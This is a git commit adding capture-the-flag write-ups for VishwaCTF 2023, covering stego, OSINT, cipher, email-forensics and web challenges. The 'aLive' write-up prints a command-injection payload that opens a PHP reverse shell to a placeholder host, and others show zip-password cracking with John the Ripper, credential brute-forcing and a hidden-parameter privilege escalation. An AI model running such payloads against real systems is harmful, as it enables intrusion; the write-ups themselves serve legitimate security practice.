feat: added VishwaCTF 2023

README.md

@@ -32,5 +32,6 @@ List of CTF events that i have joined before
 | b01lers CTF 2023 | 18 March, 05:00 WIB — 20 March 2023, 05:00 WIB | [Link](/b01lers%20CTF%202023/) |
 | OmWars CTF 2023 Quals | 18 March, 13:00 WIB — 19 March 2023, 01:00 WIB | [Link](/OmWars%20CTF%202023%20Quals/)
 | Cyber Apocalypse 2023: The Cursed Mission | 18 March, 20:00 WIB — 23 March 2023, 19:59 WIB | [Link](/Cyber%20Apocalypse%202023%20The%20Cursed%20Mission/) |
-| LINE CTF 2023 | 25 March, 07:00 WIB — 26 March 2023, 07:00 WIB | [Link](/LINE%20CTF%202023/)
-| UMass CTF 2023 | 25 March, 06:00 WIB — 27 March 2023, 00:00 WIB | [Link](/UMass%20CTF%202023/)
+| LINE CTF 2023 | 25 March, 07:00 WIB — 26 March 2023, 07:00 WIB | [Link](/LINE%20CTF%202023/) |
+| UMass CTF 2023 | 25 March, 06:00 WIB — 27 March 2023, 00:00 WIB | [Link](/UMass%20CTF%202023/) |
+| VishwaCTF 2023 | 31 March, 17:30 WIB — 02 April 2023, 17:30 WIB | [Link](/VishwaCTF%202023/) |

VishwaCTF 2023/Can you see me/README.md

@@ -0,0 +1,22 @@
+# Can you see me?
+> A magician made the seven wonders disappear. But people claim they can still feel their presence in the air.
+
+## About the Challenge
+We have been given an image (You can download the file [here](havealook.jpg))
+
+## How to Solve?
+In this case im using `binwalk` to know if there is another file inside that image. There result is there is a `zip` file
+
+![binwalk](images/binwalk.png)
+
+And then I tried to open the zip file to see if there is a flag or not in that file
+
+![zip](images/zip.png)
+
+There is a `wav` file. Extract it and open that file using Sonic Visualizer -> Spectogram to read the flag
+
+![flag](images/flag.png)
+
+```
+vishwaCTF{n0w_y0u_533_m3}
+```

VishwaCTF 2023/Fr1endship Forever/README.md

@@ -0,0 +1,32 @@
+# Fr1endship Forever
+> This is going to be a double hunt...
+
+> My childhood Fr1end James has posted something about the project he made on his socials (just to flaunt). Today is our submission day and my Fr1end James is absent. Yesterday when we met him, he told me, "Mark can you submit my project also with yours, as I will be going out of the city tomorrow morning." He forgot to tell me anything about his project. He is not even picking up my phone.
+
+> Help me find him and of course his project.
+
+## About the Challenge
+We need to find james account first to get more hints
+
+## How to Solve?
+When I tried to find in some social media (Twitter, LinkedIn, etc.) using `Fr1end James` keyword. I've found an account which I believe this account related to the chall
+
+![twitter](images/twitter.png)
+
+When I tried to stalk that account, I've got more hints
+
+![hint1](images/hint1.png)
+![hint2](images/hint2.png)
+![hint3](images/hint3.png)
+
+I belive the flag was located in GitHub and inside the comment. And then the repository is related to `endsem_last_minute`. I decided to search the repository first in GitHub using `endsem_last_minute` keyword
+
+![github](images/github.png)
+
+Open that repository and go to commit history. Find a commit with `Update Suggester.cpp` title to obtain the flag
+
+![flag](images/flag.png)
+
+```
+VishwaCTF{LbjtQY_449yfcD}
+```

VishwaCTF 2023/Guatemala/README.md

@@ -0,0 +1,26 @@
+# Guatemala
+> My friend wanted to install an antivirus for his computer, but the creator of the antivirus was caught!
+
+## About the Challenge
+We have been given a file without any extension (You can download the file [here](AV))
+
+## How to Solve?
+Im using `file` command first to know what is the type of the file
+
+![file](images/file.png)
+
+As we can see, that file is a GIF file, so I added the `.gif` extension to the file.
+
+![extension](images/extension.png)
+
+I tried to check the metadata first using `exiftool` command
+
+![metadata](images/metadata.png)
+
+There is a Base64 msg in the `Comment`. Decode it and you will obtain the flag
+
+![flag](images/flag.png)
+
+```
+vishwaCTF{pr073c7_ur_3X1F}
+```

VishwaCTF 2023/Mascot/README.md

@@ -0,0 +1,26 @@
+# Mascot
+> Very gracious host!!
+
+## About the Challenge
+We have been given a website where we can play tic-tac-toe games.
+
+![preview](images/preview.png)
+
+## How to Solve?
+When I want to check the source code, trying to win the game. The result is nothing. And then I decided to test some interesting endpoint like `.git` or `robots.txt`. And then there is `.git` folder exposed.
+
+![git](images/git.png)
+
+After checking the `config` file, we will see a GitHub repository.
+
+![config](images/config.png)
+
+Check the repository, we will see a file called `FLAGGGGG.md`. Open that file to obtain the flag
+
+![repository](images/repository.png)
+
+![flag](images/flag.png)
+
+```
+VishwaCTF{0ctOc@t_Ma5c0t}
+```

VishwaCTF 2023/Payload/README.md

@@ -0,0 +1,20 @@
+# Payload
+> No description.
+
+## About the Challenge
+We have been given a website that has a button to give us a detail about the system
+
+![preview](images/preview.png)
+
+## How to Solve?
+When I want to check the source code, trying every single thing on the `btn` parameter. The result is nothing. And then I decided to test some interesting endpoint like `.git` or `robots.txt`. And then there is a source code when I open `robots.txt`
+
+![robots](images/robots.png)
+
+As you can see, we can execute an OS command using the `cmd` parameter. And then read `index.php` file to obtain the flag or we can execute the `env` command to retrieve the flag from environtment variables
+
+![flag](images/flag.png)
+
+```
+VishwaCTF{y0u_f-o-u-n-d_M3}
+```

VishwaCTF 2023/README.md

@@ -0,0 +1,14 @@
+# vikeCTF 2023
+CTF writeup for vikeCTF 2023. I took part in this CTF competition with the my friend, @dRe and @DimasMaulana. And we got 78th place out of 1086 teams
+
+| Category | Challenge |
+| --- | --- |
+| Web | [aLive](/VishwaCTF%202023/aLive/)
+| Web | [Payload](/VishwaCTF%202023/Payload/)
+| Web | [spooky](/VishwaCTF%202023/spooky/)
+| Web | [Mascot](/VishwaCTF%202023/Mascot/)
+| Steganography | [Guatemala](/VishwaCTF%202023/Guatemala/)
+| Steganography | [Can you see me?](/VishwaCTF%202023/Can%20you%20see%20me/)
+| Forensics | [The Sender Conundrum](/VishwaCTF%202023/The%20Sender%20Conundrum/)
+| Cryptography | [The Indecipherable Cipher](/VishwaCTF%202023/The%20Indecipherable%20Cipher/)
+| OSINT | [Fr1endship Forever](/VishwaCTF%202023/Fr1endship%20Forever/)

VishwaCTF 2023/The Indecipherable Cipher/README.md

@@ -0,0 +1,17 @@
+# The Indecipherable Cipher
+> Our crypto specialist Mr.Kasiski is currently unavailable, so help us decode this string.
+
+> String: j3qrh4kgz3iptmyqxcw0zkm8i5xugs5lwl0lrwvirwktlqinexcw0zkmq5nqvpebpor5wqipqhw2ikzm4ipktzlr
+
+## About the Challenge
+We have been given an encoded string and we need to decode it to get the flag
+
+## How to Solve?
+
+Just use Vigenere Cipher decoder to obtain the flag, the key is `EMINENCESHA`
+
+![flag](images/flag.png)
+
+```
+VishwaCTF{friedrichwilhelmkasiskiwastheonewhodesignedtheaaakasiskiexaminationtodecodevignerecipher}
+```

VishwaCTF 2023/The Sender Conundrum/README.md

@@ -0,0 +1,29 @@
+# The Sender Conundrum
+> Marcus Got a Mysterious mail promising a flag if he could crack the password to the file.
+
+## About the Challenge
+We have been given an email file (You can download the file [here](TheEmail.eml)) and a password protected zip file (You can download the file [here](unzipme.zip)). We need to know the password of the zip to obtain the flag
+
+![preview_email](images/email_preview.png)
+![preview_zip](images/zip_preview.png)
+
+## How to Solve?
+As you can see there is a riddle inside the email, solve it to get the flag. But in this case I will brute the zip file using `JohnTheRipper`. Here is the command that I used
+
+```
+zip2john unzipme.zip > hash.txt
+john -w=/usr/share/wordlists/rockyou.txt hash.txt
+```
+
+And then check the password by running this command
+```
+john --show hash.txt
+```
+
+![password](images/password.png)
+
+The password is `BrandonLee`. Open the zip file again and input the password to read the flag
+
+```
+vishwaCTF{1d3n7i7y_7h3f7_is_n0t_4_j0k3}
+```

VishwaCTF 2023/The Sender Conundrum/TheEmail.eml

@@ -0,0 +1,84 @@
+Delivered-To: marcus49@gmail.com
+Received: by 2002:a92:d746:0:b0:325:b726:9767 with SMTP id e6csp2135144ilq;
+        Tue, 28 Mar 2023 08:30:07 -0700 (PDT)
+X-Google-Smtp-Source: AK7set8ORyC9DIUgH79ponX85ISyXzj7iPbRYdp5kiNWPNy8/lXsRXHtwCyOi3QxrebmlrGvLya7
+X-Received: by 2002:a05:600c:21da:b0:3ed:346d:452f with SMTP id x26-20020a05600c21da00b003ed346d452fmr13163833wmj.26.1680017407388;
+        Tue, 28 Mar 2023 08:30:07 -0700 (PDT)
+ARC-Seal: i=1; a=rsa-sha256; t=1680017407; cv=none;
+        d=google.com; s=arc-20160816;
+        b=E9+8PQydV9p6c+2FmoyXcXJ8vEH5aFsXyIT06AXDTD8+GA3VDsgH+PFKcm6Q+0AgNx
+         ipIlw3MGhb99092rwBbGFJkMQTXVV9I89tvpatCjTCxiTeTI0D061oHqAl+IyBzSKRZ2
+         6nF/GlUhkXkF0/05Fzcwbl0tbY4tkKopo9olN0+D4FdT/Fab46aRTLKPI1NwyFYYM/ix
+         e99PW4QfnO5AFR9RoCf15YfSJKG4/87PnO1hsrlE1cjs9ZS6cXslwMA7OKohcDJDYndG
+         +Pj7qNEdz+qs5yrHSYEHmFEM4LkhpczI1a6GHBMMCruqWa/pyobOMSBNxg7LHsuZM2IJ
+         mOgg==
+ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
+        h=content-transfer-encoding:mime-version:message-id:subject:from:to
+         :date:dkim-signature;
+        bh=VWTpyOXlz5T/xZJZ0XBBptmYdajES+9h6dKcEO5kUtI=;
+        b=qj2mf0126tkq9pKsliaEilQNBNRRN/Z2Pahut6ionWQlTBUmjTGPFw39EdekRo+SY2
+         lEVhXF99HFUORHN9o+ktB1Cfa2SRJnRA7dHFR6tfoqZVmUJdiletZpu81WVGBftd2J4m
+         5aaj3f2fkRd1kgPPblALmjK23VEHsMurERpM8e6DvH3vE/4PtQkCio3sCfurd2yUaEp1
+         qPwdYMk3MK62+zcHG/rpCD7q3uQW68oqegxX0hFlWevDIrhz7PQs9N4+N0razn5Dg9MB
+         I205jQ3fZTl0Hn3M6cRnZQzs+r9n1j1C2gCH43jdsNx7wj7IJmnOLmoqyz9Jovss9b1Y
+         qRbA==
+ARC-Authentication-Results: i=1; mx.google.com;
+       dkim=pass header.i=@s8.eternalimpact.info header.s=mail header.b=mB0r2vgW;
+       spf=pass (google.com: domain of noreply@anonymousemail.me designates 5.188.190.54 as permitted sender) smtp.mailfrom=noreply@anonymousemail.me;
+       dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=anonymousemail.me
+Return-Path: <BrandonLee@anonymousemail.me>
+Received: from s8.eternalimpact.info (s8.eternalimpact.info. [5.188.190.54])
+        by mx.google.com with ESMTPS id w15-20020a5d404f000000b002c407f7e2ccsi24731625wrp.452.2023.03.28.08.30.07
+        for <marcus49@gmail.com>
+        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
+        Tue, 28 Mar 2023 08:30:07 -0700 (PDT)
+Received-SPF: pass (google.com: domain of noreply@anonymousemail.me designates 5.188.190.54 as permitted sender) client-ip=5.188.190.54;
+Authentication-Results: mx.google.com;
+       dkim=pass header.i=@s8.eternalimpact.info header.s=mail header.b=mB0r2vgW;
+       spf=pass (google.com: domain of noreply@anonymousemail.me designates 5.188.190.54 as permitted sender) smtp.mailfrom=noreply@anonymousemail.me;
+       dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=anonymousemail.me
+Received: from authenticated-user (s8.eternalimpact.info [5.188.190.54])
+	(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits))
+	(No client certificate requested)
+	by s8.eternalimpact.info (Postfix) with ESMTPSA id 12E8D1019A2
+	for <naziya.22110006@viit.ac.in>; Tue, 28 Mar 2023 15:30:06 +0000 (UTC)
+DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple;
+	d=s8.eternalimpact.info; s=mail; t=1680017406;
+	bh=VWTpyOXlz5T/xZJZ0XBBptmYdajES+9h6dKcEO5kUtI=;
+	h=Date:To:From:Subject:From;
+	b=mB0r2vgWX+Fytu26GCsCMcVUB/8FmFuKWdtAUZq3CQPok8MFraLVoFIqdJGRxmqfJ
+	 /Bx5wdipi/MUS0I8ydfkp3jAbVTU0IL4lFjmEyEqEe18p22Vbek8klySbwJCZbK0IL
+	 ACGamJGOad+tdP50wsIpMymXkythLdciDxLm1xCBM3s1JDEg3zst75KBnqLyUBqTRM
+	 LE0xuthjKUN4IXB1XGUaqF9rrTvHFW4PPhnj99AlirZ57pWD4vEmfIt2BgK2z/X7+Q
+	 AT367UiUiCWIVeyfh+8yz5uh8l+MMiJrcvQsaKjGEybyCFmih06wlaAvO0+PdVdyA3
+	 9ehgu3KUt07+A==
+Date: Tue, 28 Mar 2023 15:30:05 +0000
+To: marcus49@gmail.com
+From: The Wizard <noreply@anonymousemail.me>
+Subject: test
+Message-ID: <83b697599b88b88417516d5c8749b72d@anonymousemail.me>
+MIME-Version: 1.0
+Content-Type: multipart/alternative;
+ boundary="b1=_ID1ib29X2IvvegJlCpW5TDohMaWhvme8Z50DorKLyg"
+Content-Transfer-Encoding: 8bit
+
+--b1=_ID1ib29X2IvvegJlCpW5TDohMaWhvme8Z50DorKLyg
+Content-Type: text/plain; charset=us-ascii
+
+Hello this is u but from future
+
+--b1=_ID1ib29X2IvvegJlCpW5TDohMaWhvme8Z50DorKLyg
+Content-Type: text/html; charset=us-ascii
+
+<p></p>Hello Marcus Cooper,<br>
+ You are one step behind from finding your flag. <br>
+ Here is a Riddle: <br>
+ I am a noun and not a verb or an adverb.<br>
+ I am given to you at birth and never taken away,<br>
+ You keep me until you die, come what may.<br>
+ What am I?<br>
+
+
+--b1=_ID1ib29X2IvvegJlCpW5TDohMaWhvme8Z50DorKLyg--
+
+

VishwaCTF 2023/aLive/README.md

@@ -0,0 +1,26 @@
+# aLive
+> In my college level project I created this website that tells us if any domain/ip is active or not. But there is a catch.
+
+## About the Challenge
+We have been given a website that has a functionality to check our website is active or not
+
+![preview](images/preview.png)
+
+## How to Solve?
+This website has a `Blind Command Injection` vulnerability. Because when I input `; ls` the website returned success instead of fail
+
+![testing](images/testing.png)
+
+But in this case, when I used `cat` command. The website returned `Something went wrong!`. So I decided to use reverse shell command
+
+```
+; php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh <&3 >&3 2>&3");'
+```
+
+And then read `flag.txt` file to obtain the flag
+
+![flag](images/flag.png)
+
+```
+VishwaCTF{b1inD_cmd-i}
+```

VishwaCTF 2023/spooky/README.md

@@ -0,0 +1,71 @@
+# spooky
+> I forgot my login credentials again!!
+
+## About the Challenge
+We have been given a website that has a login form
+
+![preview](images/preview.png)
+
+## How to Solve?
+I have trying every single payload to bypass the admin login (SQL and NoSQL) and the result is nothing. And then my friend, @DimasMaulana found an interesting endpoint called `sitemap.xml`
+
+![sitemap](images/sitemap.png)
+
+As you can see, we found another endpoint that contain users and password.
+
+### User:
+```
+user
+guest
+root
+admin
+kali
+raspberry
+support
+fiona
+charles
+alice
+pinocchio
+shrekop
+dragon
+donkey
+wolf
+```
+
+### Pass:
+```
+R4YPLtCnaMc8GhWy
+fX9maZjLNdqKG8wH
+r6GUEungvhXqVFyY
+WZLNBAdkXc6Yu8rh
+ny7Z2jpMT36CBwLH
+VmU5gnXKYN2vLp48
+VGUtajxuq6KeNk5J
+XZTEVmd6AcFN3j84
+ydfkG8YS7WMwpQNC
+emcYJrGFVMakw5UN
+G9fBSNbgmhTduKEU
+KctkRurdy4vSMGWF
+Ggc6qyrVdDzWhEea
+DKaYNZug9ELCzRAy
+NwCGR69ZceHu8tmT
+```
+
+Im using that username and password wordlist to bruteforce the form and we got 1 correct combination
+
+```
+User: shrekop
+Pass: VmU5gnXKYN2vLp48
+```
+
+Now we can login to the web, but we still didn't get the flag.
+
+![login](images/login.png)
+
+As you can see the role is `user`. We need to do privilege escalation from `user` to `admin` roles. To do that, when we login to the website, add `admin` parameter and the value is `true`
+
+![flag](images/flag.png)
+
+```
+VishwaCTF{h1dd3n_P@raMs}
+```